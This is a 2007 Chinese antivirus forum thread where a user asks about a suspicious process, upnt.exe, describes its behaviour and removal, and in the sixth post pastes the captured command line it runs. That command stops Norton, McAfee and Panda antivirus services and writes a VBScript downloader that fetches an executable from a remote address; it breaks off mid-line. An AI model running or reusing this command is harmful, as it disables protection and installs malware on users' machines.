瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 此到底为什么病毒?它是如何运行的?

1   1  /  1  页   跳转

此到底为什么病毒?它是如何运行的?

收藏
cboy
头像
初生襁褓狮
  • 帖子:12
  • 注册: 2007-02-01
  • 来自:
发表于: 2007-05-16 13:40 | 只看楼主 短消息 资料
字号: 1楼

此到底为什么病毒?它是如何运行的?

以前此进程名为:dservices.exe,现在更名为upnt.exe,文件路径在:C:\WINNT\system32\dllcache,加入系统服务中,并且禁用“停止”服务按钮,中止Norton杀毒软件服务,结事此进程后会自己重启,出来一图形窗口,窗口几秒后自动消失,此程序一运行,不停向外发送数据,机器速度变慢,疑为通过网络传播,以前进和名为dservices.exe时,杀毒软件可以杀,现在无法查出,流氓软件清理工具也不识别此进程。解决方法:禁用此服务,结束此进程,强行删除此文件,或者安全模式下清理,清理完毕后,加装防火墙。附图片如下

附件附件:

下载次数:169
文件类型:image/pjpeg
文件大小:
上传时间:2007-5-16 13:40:04
描述:



最后编辑2007-05-16 15:37:23
分享到:
gototop
 
cboy
头像
初生襁褓狮
  • 帖子:12
  • 注册: 2007-02-01
  • 来自:
发表于: 2007-05-16 13:45 | 只看楼主 短消息 资料
字号: 2楼

第二张图片!

附件附件:

下载次数:153
文件类型:image/pjpeg
文件大小:
上传时间:2007-5-16 13:45:54
描述:
gototop
 
cboy
头像
初生襁褓狮
  • 帖子:12
  • 注册: 2007-02-01
  • 来自:
发表于: 2007-05-16 13:48 | 只看楼主 短消息 资料
字号: 3楼

第三张

附件附件:

下载次数:169
文件类型:image/pjpeg
文件大小:
上传时间:2007-5-16 13:48:15
描述:
gototop
 
cboy
头像
初生襁褓狮
  • 帖子:12
  • 注册: 2007-02-01
  • 来自:
发表于: 2007-05-16 13:52 | 只看楼主 短消息 资料
字号: 4楼

第四张图片!

附件附件:

下载次数:192
文件类型:image/pjpeg
文件大小:
上传时间:2007-5-16 13:52:14
描述:
gototop
 
指日可待
头像
初生襁褓狮
  • 帖子:43
  • 注册: 2007-01-03
  • 来自:
发表于: 2007-05-16 15:43 | 短消息 资料
字号: 5楼

帮忙顶个,如果是线程插入到其他进程中运行的?
gototop
 
cboy
头像
初生襁褓狮
  • 帖子:12
  • 注册: 2007-02-01
  • 来自:
发表于: 2007-05-16 15:47 | 只看楼主 短消息 资料
字号: 6楼

找到了它是如何运行的:通过cmd.exe执行下面的命令,通过网络传播的
-----------------------------------------------------------
CommandLine = cmd /c net stop "Norton AntiVirus Auto Protect Service"&net stop Mcshield&net stop "Panda Antivirus"&echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://192.168.0.150:15036/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\upnt.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs€C
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT